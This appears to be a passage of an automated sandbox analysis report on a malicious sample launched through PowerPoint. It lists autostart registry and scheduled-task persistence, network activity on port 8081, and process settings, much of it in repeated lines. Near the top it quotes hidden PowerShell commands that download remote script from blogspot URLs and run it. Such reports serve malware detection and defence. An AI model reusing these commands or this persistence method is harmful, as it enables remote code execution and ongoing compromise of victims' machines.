          Persistence and Installation Behavior:

          barindex

          Boot Survival:

          barindex
          Creates an autostart registry key pointing to binary in C:\WindowsShow sources
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParamJump to behavior
          Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParam powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;Jump to behavior
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParamJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NetwrixParamJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Uses known network protocols on non-standard portsShow sources
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
